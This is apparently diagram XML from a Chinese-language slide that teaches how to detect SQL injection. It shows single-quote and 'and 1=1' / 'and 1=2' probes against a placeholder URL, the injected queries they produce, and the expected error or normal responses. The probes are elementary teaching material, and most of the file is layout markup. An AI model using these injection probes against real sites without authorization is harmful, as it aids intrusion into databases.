    <dgm:cxn modelId="{7937A4AF-5BF2-4F02-8C6C-491D8FD76968}" type="presParOf" srcId="{D7C9DAF1-3B5C-4E91-855D-AEAEB3CA2298}" destId="{60FD5D8B-9F66-4838-94DA-76FA5D4CCB13}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{1330AB65-43E7-43B3-9719-A6F36BF13F8E}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{58B13D05-1D7A-40DB-B424-F63B90A26E30}" type="presParOf" srcId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" destId="{4822013A-C343-43D2-97CF-C1BDC47DE091}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{5877ED22-1BAE-4E4F-885B-5959C6872D19}" type="presParOf" srcId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" destId="{2278B80B-133A-45A7-AC6E-38851CED986C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{F42D0B85-146A-4597-9C4B-70C01B1723CF}" type="presParOf" srcId="{06BD3678-E95A-42A7-B4F1-817A30B3346D}" destId="{898168FD-4B68-4DD6-82B5-0F37B3C2E0C2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{EEF85A2F-4D26-4B7F-A3BD-AE21A7E58298}" type="presParOf" srcId="{0A214BE0-CA72-4D95-B38E-AA95CC1D4AC2}" destId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{01A43124-BDC5-4A01-BD17-D97DAEA40FD2}" type="presParOf" srcId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" destId="{50A3536C-94AA-4AD6-976A-74FB22FEF420}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{A3FB5D1C-CA3D-4B5E-8D14-96863DDEA075}" type="presParOf" srcId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" destId="{30A5B66D-80B2-49F9-90B4-359B4D9DBA78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList"/>
    <dgm:cxn modelId="{A4802008-2CD6-4509-8381-92C155194A1F}" type="presParOf" srcId="{E86C33AC-0B20-4748-81C9-52E35DAC33B3}" destId="{A1567578-90E9-4C1F-AA15-627382938DD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77DC8-B561-4476-AD78-EF855CA64D85}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1#3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E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>单引号</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{431000AD-47BE-4833-AC6D-E837A917AA4A}" type="parTrans" cxnId="{A7D74A6C-73D7-43D2-B72F-CB08A9F7B89A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEC3E4D1-BFAE-477B-A4C0-34CF62FB8F3F}" type="sibTrans" cxnId="{A7D74A6C-73D7-43D2-B72F-CB08A9F7B89A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{801D1502-F20A-41CA-902A-5DBC40170BCB}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>http://abc.com/?id='</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60467412-EB0C-434C-AEC9-9C1335149086}" type="parTrans" cxnId="{3E64892C-38C5-4468-9AF1-934B9A66C56C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86F193EC-1E38-4447-8DB4-5AB450B600B9}" type="sibTrans" cxnId="{3E64892C-38C5-4468-9AF1-934B9A66C56C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4DB994D-65A9-435B-90E4-85FBB5EF511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select </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>* </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>from tables</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>where id= </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>;</a:t>
          </a:r>
          <a:endParaRPr sz="2100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36916C9A-ACCD-41EC-80FF-02A82B342DC4}" type="parTrans" cxnId="{466A7BAC-50F7-40EA-B2DA-468662E851DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24147C71-AB8B-44C3-843C-F603AC8BDAC3}" type="sibTrans" cxnId="{466A7BAC-50F7-40EA-B2DA-468662E851DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF75F311-8D83-DD47-BF91-FD3432877BC2}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
            <a:t>sql</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>解析引擎报错</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F5131D-731D-3E4B-93B1-DD889747108B}" type="parTrans" cxnId="{08D7EE3B-9E83-4A15-8E59-F2F287FB4FEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE1C56F3-DF4C-2049-BED3-5110DD156305}" type="sibTrans" cxnId="{08D7EE3B-9E83-4A15-8E59-F2F287FB4FEC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>条件</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{252BA8D5-E45E-4AB0-8F01-F4D80C77138C}" type="parTrans" cxnId="{FE076EE0-7F9C-4C1A-8E21-6F87DD1277BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{723DDA95-2CC9-4202-940F-D8B17E4EBD6F}" type="sibTrans" cxnId="{FE076EE0-7F9C-4C1A-8E21-6F87DD1277BE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36B01B6E-1389-40FA-B3D4-B6B78B28B345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1 and 1=1 (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>数字型</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="20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dirty="0"/>
            <a:t> and 1=1 --(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>字符型）</a:t>
          </a:r>
          <a:endParaRPr sz="2100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B495D759-4FCA-459D-A4AC-AFF3721C091D}" type="parTrans" cxnId="{EEA16946-9E8A-452A-AAFC-C128BE6B5CBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5BDF351-2EE0-4E6A-8B5D-4A3797829AF9}" type="sibTrans" cxnId="{EEA16946-9E8A-452A-AAFC-C128BE6B5CBF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5137D415-60ED-5C4D-907A-749316E30F0D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select </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>* </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>from tables</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>where id= </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1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b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>and 1=1 --</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3525A068-FDD6-E246-B338-6485A6F18D77}" type="parTrans" cxnId="{67BB5A59-FE6B-4240-9F72-94D29AF55468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7B3F881-EC7A-0841-B6EC-75AB701EAB5C}" type="sibTrans" cxnId="{67BB5A59-FE6B-4240-9F72-94D29AF55468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8476FB5D-FED1-4041-97BE-FE42E89C07B0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>访问正常</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9EA5B1FF-6707-7F4E-8FD9-A2350FA5E2B6}" type="parTrans" cxnId="{5CD26684-1163-467E-9AD9-92CE792324EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD61D7EB-9347-3E40-9C8E-5DC01064118B}" type="sibTrans" cxnId="{5CD26684-1163-467E-9AD9-92CE792324EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85334D9B-2A60-384D-B2BD-5E19072AB91E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>条件</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C616930-0E85-874F-BFAB-77642F204067}" type="parTrans" cxnId="{34A78453-F358-4120-8E49-A86EB18001EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B11F0B6-4173-B640-8D43-283FBDCCDBAB}" type="sibTrans" cxnId="{34A78453-F358-4120-8E49-A86EB18001EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{339A4001-24BD-1E4A-B308-B6407229A83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1 and 1=2(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>数字型</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="20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/>
            <a:t>1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="20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dirty="0"/>
            <a:t> and 1=2 --(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
            <a:t>字符型）</a:t>
          </a:r>
          <a:endParaRPr sz="2100"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58920F38-F086-464B-BC57-2951E567309F}" type="parTrans" cxnId="{CCB81CC3-C642-4979-9D93-810D6E1D1FCB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6669D5C1-78FF-BF4F-90EE-F4CB49AC7FF2}" type="sibTrans" cxnId="{CCB81CC3-C642-4979-9D93-810D6E1D1FCB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{974520B2-8CA6-3248-A12B-30AE334A9F8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select </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>* </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>from tables</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            <a:t>where id= </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>and 1=2 --</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3A2581F-1757-3140-A27F-65A9FC479AB7}" type="parTrans" cxnId="{4DB8AC12-3D8D-404E-ADF3-BC2C6306D6EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45EF0EB2-20A2-CE41-BAF3-ABCBBF2A6EA6}" type="sibTrans" cxnId="{4DB8AC12-3D8D-404E-ADF3-BC2C6306D6EC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2E72316-0BCE-2A4F-AAA4-0783A12510BA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>访问异常</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6E72754-A750-984A-A67C-D88D76368704}" type="parTrans" cxnId="{EE723CD4-75DB-4551-8764-B17D1F52CE5C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0E355EFA-3742-5949-9211-6F634002D066}" type="sibTrans" cxnId="{EE723CD4-75DB-4551-8764-B17D1F52CE5C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" type="pres">
      <dgm:prSet presAssocID="{BA977DC8-B561-4476-AD78-EF855CA64D85}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" type="pres">
      <dgm:prSet presAssocID="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" presName="vertFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C08D936D-FB79-4CF2-8173-3835989193E6}" type="pres">
      <dgm:prSet presAssocID="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" presName="header" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6173BA66-ACBB-45FF-9F58-E4F9FDB1BDAF}" type="pres">
      <dgm:prSet presAssocID="{60467412-EB0C-434C-AEC9-9C1335149086}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2C0D37F-E97E-465A-88FE-4F69714316BD}" type="pres">
      <dgm:prSet presAssocID="{801D1502-F20A-41CA-902A-5DBC40170BCB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1552FF9C-879A-4EF6-8F21-C3EA90CA04D5}" type="pres">
      <dgm:prSet presAssocID="{86F193EC-1E38-4447-8DB4-5AB450B600B9}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3529335B-393C-4877-B529-79367D51A1EE}" type="pres">
      <dgm:prSet presAssocID="{F4DB994D-65A9-435B-90E4-85FBB5EF5119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9A5A7F41-1ED1-5548-A436-59721DF09EA7}" type="pres">
      <dgm:prSet presAssocID="{24147C71-AB8B-44C3-843C-F603AC8BDAC3}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80D7D441-6FCD-704B-9281-D4576CE3B5D8}" type="pres">
      <dgm:prSet presAssocID="{EF75F311-8D83-DD47-BF91-FD3432877BC2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F93FC68E-4CB8-4174-BE12-C3F05327D359}" type="pres">
      <dgm:prSet presAssocID="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" presName="hSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" type="pres">
      <dgm:prSet presAssocID="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" presName="vertFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{535FB04B-59D7-4758-B949-33370926E967}" type="pres">
      <dgm:prSet presAssocID="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" presName="header" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D2705B9-1F03-4086-9FF8-1311E873F6E8}" type="pres">
      <dgm:prSet presAssocID="{B495D759-4FCA-459D-A4AC-AFF3721C091D}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8EFD87A1-CD1E-40B3-BE74-2D3837AF0BA9}" type="pres">
      <dgm:prSet presAssocID="{36B01B6E-1389-40FA-B3D4-B6B78B28B345}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="9" custLinFactNeighborX="-496" custLinFactNeighborY="11335">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C6CDCDA-9191-4CCC-BD60-1A487D5768AA}" type="pres">
      <dgm:prSet presAssocID="{D5BDF351-2EE0-4E6A-8B5D-4A3797829AF9}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="4" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99F6BB5E-BE17-F741-AF6D-7DBE4FC74D97}" type="pres">
      <dgm:prSet presAssocID="{5137D415-60ED-5C4D-907A-749316E30F0D}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="9" custLinFactNeighborX="992" custLinFactNeighborY="11334">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{442A2723-CCC4-8A4F-A5F7-123936076C6B}" type="pres">
      <dgm:prSet presAssocID="{E7B3F881-EC7A-0841-B6EC-75AB701EAB5C}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="5" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C08A805F-9C20-4444-B427-D6D304B9C7B7}" type="pres">
      <dgm:prSet presAssocID="{8476FB5D-FED1-4041-97BE-FE42E89C07B0}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A613BEB1-0D10-46F6-8620-166A950E835D}" type="pres">
      <dgm:prSet presAssocID="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" presName="hSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" type="pres">
      <dgm:prSet presAssocID="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" presName="vertFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A89538F6-290A-CA43-AFBE-4A025999F71E}" type="pres">
      <dgm:prSet presAssocID="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" presName="header" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
